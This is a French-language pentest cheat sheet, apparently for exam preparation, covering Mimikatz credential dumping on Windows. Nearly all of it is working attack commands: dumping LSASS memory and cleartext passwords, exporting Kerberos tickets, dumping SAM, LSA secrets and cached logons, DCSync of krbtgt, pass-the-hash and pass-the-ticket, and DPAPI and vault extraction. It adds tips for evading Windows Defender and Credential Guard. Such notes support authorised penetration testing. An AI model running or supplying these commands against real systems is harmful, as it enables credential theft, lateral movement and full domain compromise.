Mimikatz — dump de credentials
sommaire
Prérequis & lancement
Nécessite des droits admin (idéalement SYSTEM) + le privilège debug. Windows Defender le détecte/quarantaine dès l’écriture sur disque : prévoir exclusion, exécution en mémoire, ou les alternatives (pypykatz, dump comsvcs.dll — voir fiche Privesc Windows).
.\mimikatz.exe # mode interactif
mimikatz # privilege::debug # OBLIGATOIRE avant tout
mimikatz # log mimi.log # tout logger dans un fichier
mimikatz # token::elevate # tenter de passer SYSTEM
# one-liner (pratique en shell non interactif / via SSH) :
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
Dump mémoire LSASS
sekurlsa::logonpasswords # creds en clair / hash NTLM des sessions ouvertes
sekurlsa::wdigest # mots de passe en clair (si WDigest actif)
sekurlsa::tickets /export # tickets Kerberos -> fichiers .kirbi
sekurlsa::ekeys # cles de chiffrement (aes, rc4, des)
kerberos::list # tickets de l'utilisateur courant
SAM / LSA / Active Directory
lsadump::sam # hash locaux (SAM)
lsadump::secrets # secrets LSA (creds de services...)
lsadump::cache # logons domaine en cache (MSCASHv2)
# DCSync : dump n'importe quel hash du domaine (droits de replication requis)
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:LAB.LOCAL /user:Administrateur
Réutilisation des creds (PtH / PtT)
# Pass-the-Hash : ouvre un processus avec le hash injecte
sekurlsa::pth /user:Administrateur /domain:LAB.LOCAL /ntlm:<HASH> /run:cmd.exe
# Pass-the-Ticket : injecter un .kirbi exporte
kerberos::ptt ticket.kirbi
kerberos::purge # vider le cache tickets avant injection
DPAPI & vault
sekurlsa::dpapi # masterkeys en memoire
dpapi::masterkey /in:"C:\...\masterkey" /rpc # dechiffrer via le DC
vault::list # gestionnaire d'identifiants
vault::cred
Tips examen
• Un hash NTLM récupéré → le tester direct en PtH (nxc smb sur tout le subnet) avant de le casser (hashcat -m 1000). • DCSync : pas besoin de shell sur le DC, juste les droits « Replicating Directory Changes » (DA par défaut). • Toujours logger (log mimi.log), rapatrier le fichier et grep — la sortie est longue. • Credential Guard / LSASS protégé (RunAsPPL) → le dump mémoire échoue : viser SAM, DPAPI, tickets. • Un .exe mimikatz déposé peut disparaître (quarantaine) : vérifier sa présence après upload.